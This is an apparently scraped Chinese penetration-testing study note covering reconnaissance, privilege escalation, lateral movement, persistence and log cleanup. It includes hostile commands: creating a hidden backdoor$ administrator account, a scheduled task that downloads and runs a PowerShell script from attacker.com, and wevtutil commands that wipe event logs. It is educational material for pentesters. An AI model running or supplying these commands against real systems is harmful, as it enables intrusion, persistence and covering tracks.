外网打点提权到内网横向渗透学习笔记<\/h1>

一、信息收集阶段<\/h2>

1. 资产发现<\/h3>
使用fofa进行目标资产探测，语法示例：
title="目标公司名称"
domain="目标域名"
ip="目标IP段"
<\/code><\/pre>
<\/li>
<\/ul>
2. 端口扫描<\/h3>

使用nmap进行全端口扫描：
nmap -p- -T4 -v <target_ip> -oA allports
<\/code><\/pre>
<\/li>
对开放端口进行服务识别：
nmap -sV -sC -p <开放端口> <target_ip>
<\/code><\/pre>
<\/li>
<\/ul>
3. Web应用探测<\/h3>

目录扫描工具：
dirsearch -u http:\/\/target.com -e php,asp,aspx,jsp
<\/code><\/pre>
<\/li>
指纹识别：
whatweb http:\/\/target.com
<\/code><\/pre>
<\/li>
<\/ul>
二、漏洞利用阶段<\/h2>
1. Web漏洞利用<\/h3>

常见漏洞类型：

SQL注入<\/li>
XSS<\/li>
文件上传<\/li>
文件包含<\/li>
反序列化<\/li>
<\/ul>
<\/li>
<\/ul>
2. 中间件漏洞<\/h3>

常见中间件漏洞：

Apache Struts2<\/li>
Weblogic<\/li>
JBoss<\/li>
Tomcat<\/li>
<\/ul>
<\/li>
<\/ul>
3. 服务漏洞利用<\/h3>

常见服务漏洞：

Redis未授权访问<\/li>
MySQL弱口令<\/li>
FTP匿名登录<\/li>
SMB漏洞(如永恒之蓝)<\/li>
<\/ul>
<\/li>
<\/ul>
三、权限提升阶段<\/h2>
1. 本地信息收集<\/h3>

系统信息：
systeminfo
whoami \/priv
<\/code><\/pre>
<\/li>
网络信息：
ipconfig \/all
netstat -ano
<\/code><\/pre>
<\/li>
用户信息：
net user
net localgroup administrators
<\/code><\/pre>
<\/li>
<\/ul>
2. 提权方法<\/h3>

内核漏洞提权：

使用wesng识别可用的内核漏洞<\/li>
常见提权exp：CVE-2021-4034、CVE-2020-1472等<\/li>
<\/ul>
<\/li>
服务配置不当：

可写服务<\/li>
不安全的服务权限<\/li>
<\/ul>
<\/li>
凭证窃取：

使用mimikatz获取明文密码<\/li>
从配置文件、注册表中寻找凭证<\/li>
<\/ul>
<\/li>
<\/ul>
四、内网横向移动<\/h2>
1. 内网信息收集<\/h3>

域信息：
net view \/domain
net group "Domain Admins" \/domain
<\/code><\/pre>
<\/li>
共享资源：
net view \\DC01
<\/code><\/pre>
<\/li>
<\/ul>
2. 凭证传递攻击<\/h3>

Pass-the-Hash (PtH)<\/li>
Pass-the-Ticket (PtT)<\/li>
Overpass-the-Hash<\/li>
<\/ul>
3. 横向移动技术<\/h3>

WMI执行：
wmic \/node:<target> \/user:<user> \/password:<pass> process call create "cmd.exe \/c whoami"
<\/code><\/pre>
<\/li>
PsExec：
psexec.exe \\<target> -u <user> -p <pass> cmd.exe
<\/code><\/pre>
<\/li>
计划任务：
schtasks \/create \/s <target> \/u <user> \/p <pass> \/tn "taskname" \/tr "cmd.exe \/c whoami" \/sc once \/st 00:00
<\/code><\/pre>
<\/li>
<\/ul>
五、权限维持<\/h2>
1. 后门技术<\/h3>

创建隐藏用户：
net user backdoor$ Password123! \/add
net localgroup administrators backdoor$ \/add
<\/code><\/pre>
<\/li>
计划任务后门：
schtasks \/create \/tn "Update" \/tr "cmd.exe \/c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http:\/\/attacker.com\/rev.ps1')\"" \/sc minute \/mo 1
<\/code><\/pre>
<\/li>
<\/ul>
2. 隧道技术<\/h3>

SSH隧道：
ssh -D 1080 user@jump_host
<\/code><\/pre>
<\/li>
frp\/ngrok内网穿透<\/li>
<\/ul>
六、痕迹清理<\/h2>
1. 日志清理<\/h3>

清除事件日志：
wevtutil cl security
wevtutil cl system
wevtutil cl application
<\/code><\/pre>
<\/li>
清除IIS日志：
del \/q \/f C:\inetpub\logs\LogFiles\W3SVC1\*
<\/code><\/pre>
<\/li>
<\/ul>
2. 文件清理<\/h3>

删除上传的工具和脚本<\/li>
清除临时文件<\/li>
<\/ul>
七、防御规避<\/h2>
1. 免杀技术<\/h3>

使用C#\/Python重写工具<\/li>
使用内存加载技术<\/li>
混淆和加密payload<\/li>
<\/ul>
2. 权限控制<\/h3>

使用低权限账户进行操作<\/li>
避免直接使用域管理员账户<\/li>
<\/ul>
八、工具清单<\/h2>


信息收集：<\/p>

nmap<\/li>
masscan<\/li>
fofa\/hunter<\/li>
<\/ul>
<\/li>

漏洞利用：<\/p>

metasploit<\/li>
sqlmap<\/li>
burpsuite<\/li>
<\/ul>
<\/li>

内网渗透：<\/p>

cobalt strike<\/li>
mimikatz<\/li>
impacket工具包<\/li>
<\/ul>
<\/li>

隧道工具：<\/p>

frp<\/li>
ngrok<\/li>
chisel<\/li>
<\/ul>
<\/li>

后渗透：<\/p>

PowerSploit<\/li>
BloodHound<\/li>
Seatbelt<\/li>
<\/ul>
<\/li>
<\/ol>
九、注意事项<\/h2>

法律合规：确保获得授权<\/li>
操作记录：详细记录每一步操作<\/li>
影响评估：避免影响业务系统<\/li>
报告编写：详细记录漏洞和修复建议<\/li>
<\/ol>
十、学习资源<\/h2>


书籍：<\/p>

《Metasploit渗透测试指南》<\/li>
《内网安全攻防：渗透测试实战指南》<\/li>
<\/ul>
<\/li>

在线课程：<\/p>

OSCP认证课程<\/li>
SANS SEC560<\/li>
<\/ul>
<\/li>

靶场：<\/p>

HackTheBox<\/li>
VulnHub<\/li>
国内各大SRC提供的测试环境<\/li>
<\/ul>
<\/li>

社区：<\/p>

FreeBuf<\/li>
看雪学院<\/li>
先知社区<\/li>
<\/ul>
<\/li>
<\/ol>